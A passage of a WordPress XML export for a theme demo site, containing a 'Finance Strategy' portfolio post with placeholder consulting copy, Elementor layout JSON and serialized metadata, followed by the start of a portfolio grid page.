1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=842</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>842</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3c1bcc97","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"269995a","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5abe166e","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1f4595df","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"3738a3a7","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"2a6a10f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"17d6ef46","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3ad8441","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4c261373","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"71428679","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1e56f55c","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"4a101bc2","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"344e5a57","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31ba8a7c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"618b4571","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d286c1c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"772279c4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"683bd9c1","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"58ac0934","elType":"section","settings":[],"elements":[{"id":"5f0307b8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7fc027c8","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b1c6dce","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"703cb19c","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7c391983","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"36a23db2","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2b256455","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"314e22b3","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"15ab0039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6f224ce5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2de7223b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1ed39b6d","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d83ba2e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"589615f6","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"5476d97","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7e33be28","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5366e0d2","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f0a696","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"12866002","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"51c3fad0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"58491f2a","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2c46a0c7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"545c307b","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"bc5596f","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1220]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[844]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_w]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio-grid/</link>
		<pubDate>Fri, 11 Sep 2020 07:25:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=847</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1-1200x1200.jpg 1200w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">
